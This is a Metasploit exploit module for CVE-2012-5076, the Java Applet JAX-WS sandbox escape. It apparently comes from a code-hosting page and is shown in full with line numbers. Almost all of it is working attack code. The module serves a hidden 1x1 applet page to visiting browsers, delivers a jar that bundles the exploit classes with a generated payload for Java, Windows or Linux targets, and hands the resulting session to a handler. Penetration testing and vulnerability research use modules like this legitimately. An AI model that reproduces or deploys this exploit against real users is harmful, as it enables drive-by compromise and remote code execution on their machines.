Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #include Msf::Exploit::Remote::BrowserAutopwn
12
  #autopwn_info({ :javascript => false })
13

14
  def initialize( info = {} )
15
    super( update_info( info,
16
      'Name'          => 'Java Applet JAX-WS Remote Code Execution',
17
      'Description'   => %q{
18
          This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
19
        code outside of the sandbox as exploited in the wild in November of 2012. The
20
        vulnerability affects Java version 7u7 and earlier.
21
      },
22
      'License'       => MSF_LICENSE,
23
      'Author'        =>
24
        [
25
          'Unknown', # Vulnerability Discovery
26
          'juan vazquez' # metasploit module
27
        ],
28
      'References'    =>
29
        [
30
          [ 'CVE', '2012-5076' ],
31
          [ 'OSVDB', '86363' ],
32
          [ 'BID', '56054' ],
33
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
34
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
35
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
36
        ],
37
      'Platform'      => %w{ java win },
38
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
39
      'Targets'       =>
40
        [
41
          [ 'Generic (Java Payload)',
42
            {
43
              'Arch' => ARCH_JAVA,
44
            }
45
          ],
46
          [ 'Windows Universal',
47
            {
48
              'Arch' => ARCH_X86,
49
              'Platform' => 'win'
50
            }
51
          ],
52
          [ 'Linux x86',
53
            {
54
              'Arch' => ARCH_X86,
55
              'Platform' => 'linux'
56
            }
57
          ]
58
        ],
59
      'DefaultTarget'  => 0,
60
      'DisclosureDate' => '2012-10-16'
61
      ))
62
  end
63

64

65
  def on_request_uri( cli, request )
66
    if not request.uri.match(/\.jar$/i)
67
      if not request.uri.match(/\/$/)
68
        send_redirect(cli, get_resource() + '/', '')
69
        return
70
      end
71

72
      print_status("#{self.name} handling request")
73

74
      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
75
      return
76
    end
77

78
    paths = [
79
      [ "Exploit.class" ],
80
      [ "MyPayload.class" ]
81
    ]
82

83
    p = regenerate_payload(cli)
84

85
    jar  = p.encoded_jar
86

87
    paths.each do |path|
88
      1.upto(path.length - 1) do |idx|
89
        full = path[0,idx].join("/") + "/"
90
        if !(jar.entries.map{|e|e.name}.include?(full))
91
          jar.add_file(full, '')
92
        end
93
      end
94
      fd = File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2012-5076", path ), "rb")
95
      data = fd.read(fd.stat.size)
96
      jar.add_file(path.join("/"), data)
97
      fd.close
98
    end
99

100
    print_status("Sending Applet.jar")
101
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
102

103
    handler( cli )
104
  end
105

106
  def generate_html
107
    jar_name = rand_text_alpha(rand(6)+3) + ".jar"
108
    html  = "<html><head></head>"
109
    html += "<body>"
110
    html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
111
    html += "</applet></body></html>"
112
    return html
113
  end
114
end
115

116